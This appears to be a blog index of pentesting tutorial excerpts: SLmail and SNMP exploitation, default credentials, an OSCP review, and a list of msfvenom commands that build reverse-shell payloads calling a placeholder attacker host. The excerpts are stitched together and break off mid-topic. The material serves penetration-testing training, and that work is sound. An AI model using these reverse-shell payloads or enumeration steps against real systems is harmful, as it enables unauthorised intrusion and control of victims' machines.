Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network

Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network 

Vulnerabilities exist on a particular machine can be software and hardware based. Today we will see how we can Exploit Software Based Vulnerabilities to take over target machine.

Software based vulnerabilities are nothing, but just a coding/programming error exist in a Particular software version or series. Which can be hacked/compromise using a group of malicious code called as an "Exploit".

First we have identified a SMTP service on our target machine 192.168.131.137

SLmail smtpd 5.5.0 4433 is running in port 25 

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting

From our previous post, We have identified the community strings Via Nmap Scan & Brute Forcing the Community String Values.

Now we will see, How can we use those Extracted Community strings for Post Exploitation.

To perform We will use various tools as mention below.

What Is MIB in SNMP

The SNMP Management Information Base (MIB) is a database containing information

usually related to network management. The database is organized like a tree, where

branches represent different organizations or network functions. The leaves of the tree

(final endpoints) correspond to specific variable values that can then be accessed, and

probed, by an external user. To read more about the MIB tree, refer to the following

http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.

aix.progcomm/doc/progcomc/mib.htm

For example, the following MIB values correspond to specific Microsoft Windows

SNMP parameters.

1.3.6.1.2.1.25.1.6.0        System Processes

1.3.6.1.2.1.25.4.2.1.2     Running Programs

1.3.6.1.2.1.25.4.2.1.4     Processes Path

1.3.6.1.2.1.25.2.3.1.4     Storage Units

1.3.6.1.2.1.25.6.3.1.2     Software Name

1.3.6.1.4.1.77.1.2.25      User Accounts

1.3.6.1.2.1.6.13.1.3        TCP LocalPorts

Default Credentials Vulnerability : Attacking Network - Network Pentesting

Default Credentials Vulnerability : Attacking Network - Network Pentesting

Hello reader, We have talked lots of about Web Hacking & today i decided to blog some intresting things about Attacking Network - Network Pentesting.

For your information, for demonstration purpose i am using Vyatta VM, which you can also download from http://packages.vyos.net/iso/release/1.1.7/ 

Today we will see the common vulnerability which most of admin do, by keeping default configuration or you can also say keeping default credentials.

So we have a Target machine on 192.168.131.135 & our Attacking Machine on 192.168.131.134

Lets do a Nmap Service Scan on our target machine.

nmap -sV 192.168.131.135 

So we got some information like port 22, 23, 80 & 443.

Apart from all port, 22 & 23 looks interesting for us and it might possible that credentials would be default for that service. 

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Below is the different type of Metasploit Payloads we can use while to get the reverse shell of victim machine.

These exploit can be used in metasploit by using set payload "payloadnae" and before it we have to set multi handler which can be configured by use exploit/multi/handler

Mention payloads require certain inputs as an option such as LHOST, LPORT.

Operating System Based Bionaries Shell

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection

Penetration Testing with Kali Linux OSCP Review and Course, Lab experience — My OSCP Review :Try Harder! ;)

 Penetration Testing with Kali Linux OSCP Review and Course, Lab experience — My OSCP Review :Try Harder! ;) 

Introduction:

Gaining the OSCP certification is a challenge like no other. After my experience with the OSCP exam course from Offensive Security, I decided to go ahead and write an OSCP Review. I registered for this course in July 2015 and choose 90 Days lab. Within a week I received Mail from Offensive Security regarding VPN Access, Course Material all etc.

OSCP is a combination of Network, System & Web Hacking also a medium part of Exploit Writing, where you have to write an exploit for a particular vulnerable software.

Who am I:

For those who doesn’t know me .My name is Narendra Bhati, working @Suma Soft Ptv. Ltd. As Security Analyst. I have 3+ years of experience in Application VAPT. I am also bug bounty hunter and doing it from last 3 years. Yes lots of money ;) apart from salary.

About The OSCP Course: